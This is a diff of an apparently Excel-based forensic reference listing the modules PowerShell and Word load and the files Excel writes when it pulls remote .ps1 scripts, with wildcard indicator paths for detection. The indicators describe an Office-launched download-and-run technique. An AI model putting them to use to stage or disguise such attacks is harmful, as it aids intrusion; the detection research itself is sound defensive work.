+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\fa13923a20a9ae44540d6438a1f677b6\Microsoft.PowerShell.Commands.Management.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Remote Access API - C:\Windows\System32\rasapi32.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Remote Access Connection Manager - C:\Windows\System32\rasman.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Routing Utilities - C:\Windows\System32\rtutils.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+SRP APIs Dll - C:\Windows\System32\srpapi.dll
+Routing Utilities - C:\Windows\System32\rtutils.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Remote Access Connection Manager - C:\Windows\System32\rasman.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Remote Access API - C:\Windows\System32\rasapi32.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\542c2e5af7d5e3b6a94baf2bccd7a410\Microsoft.PowerShell.Commands.Management.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Microsoft (R) HTML Viewer - C:\Windows\System32\mshtml.dll
+MSCTF Server DLL - C:\Windows\System32\msctf.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+Common Controls Library - C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.248_none_15ced204935f55d7\comctl32.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
+Common Controls Library - C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8\comctl32.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Internet Extensions for Win32 - C:\Windows\System32\wininet.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft (R) HTML Viewer - C:\Windows\System32\mshtml.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\fa13923a20a9ae44540d6438a1f677b6\Microsoft.PowerShell.Commands.Management.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+OLE32 Extensions for Win32 - C:\Windows\System32\urlmon.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Remote Access API - C:\Windows\System32\rasapi32.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Remote Access Connection Manager - C:\Windows\System32\rasman.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Routing Utilities - C:\Windows\System32\rtutils.dll
+Run time utility for Internet Explorer - C:\Windows\System32\iertutil.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>winword.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>BranchCache Client Library - C:\Windows\SysWOW64\PeerDist.dll
+Microsoft Access database engine DLL - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACECORE.DLL
+Microsoft Access database engine Expression Service - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACEES.DLL
+Microsoft Access database engine OLE DB Provider - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACEOLEDB.DLL
+Microsoft Access database engine Sort DLL - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\ACEWSTR.DLL
+Microsoft Conversion Library - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\MSCONV97.DLL
+Microsoft Office 2000 component - C:\Windows\SysWOW64\hlink.dll
+Microsoft Office Document Cache - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Csi.dll
+Microsoft UI Automation Core - C:\Windows\SysWOW64\UIAutomationCore.dll
+Microsoft Visual Basic for Applications component - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL
+Microsoft® C Runtime Library - C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\msvcr100.dll
+OLE DB Core Services - C:\Program Files (x86)\Common Files\System\Ole DB\oledb32.dll
+OLE DB Runtime Routines - C:\Windows\SysWOW64\msdart.dll
+Offline Files Win32 API - C:\Windows\SysWOW64\cscapi.dll
+Recover Text Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\RECOVR32.CNV
+SearchFolder - C:\Windows\SysWOW64\SearchFolder.dll
+Shell extensions for sharing - C:\Windows\SysWOW64\ntshrui.dll
+Visual Basic Design Time Environment - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
+Visual Basic Environment International Resources - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL
+Visual Basic for Applications Development Environment - Expression Service Loader - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\VBAJET32.DLL
+Visual Basic for Applications Runtime - Expression Service - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\EXPSRV.DLL
+Windows File Protection - C:\Windows\SysWOW64\sfc.dll
+Windows File Protection - C:\Windows\SysWOW64\sfc_os.dll
+Windows Volume Tracking - C:\Windows\SysWOW64\linkinfo.dll
+WordPerfect 5.x Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\WPFT532.CNV
+WordPerfect 6.x - 7.0 Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\WPFT632.CNV
+twinapi - C:\Windows\SysWOW64\twinapi.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Excel.exe writes:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url
+e.g
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">C:\Users\MATTHE~1\AppData\Local\Temp\aria-debug-1580.log
+C:\Users\Matthew Green\AppData\Roaming\Microsoft\Excel\FB9BF000
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\Matthew Green\AppData\Roaming\Microsoft\Office\Recent\payloads on raw.githubusercontent.com.url</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\Matthew Green\AppData\Roaming\Microsoft\Office\Recent\index.dat
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\Matthew Green\AppData\Roaming\Microsoft\Office\Recent\test.ps1.url</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\Matthew Green\AppData\Roaming\Microsoft\Office\Recent
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso9A76.tmp
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\155B80EB.ps1
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR\test[1].ps1
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3FA61915.ps1
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.MSO
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE
+C:\Users\MATTHE~1\AppData\Local\Temp\JET94C9.tmp
+C:\Users\MATTHE~1\AppData\Local\Temp\{1013C433-4642-415C-B304-8B7CB8ACEFD0} - OProcSessId.dat</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Excel.exe writes:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url
+e.g
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\Matt.DFIR\AppData\Roaming\Microsoft\Office\Recent\master on raw.githubusercontent.com.url</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">C:\Users\Matt.DFIR\AppData\Roaming\Microsoft\Office\Recent\test.ps1.url
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE\G72KSDID\test[1].ps1
+</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Excel.exe writes:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
+C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url
+e.g
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">C:\Users\Matt.DFIR\AppData\Roaming\Microsoft\Office\Recent\master on raw.githubusercontent.com.url
+C:\Users\Matt.DFIR\AppData\Roaming\Microsoft\Office\Recent\test.ps1.url
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\377803A4.ps1</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Powershell.exe loads additional modules:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">IE ActiveX Interface Marshaling Library - C:\Program Files\Internet Explorer\ieproxy.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
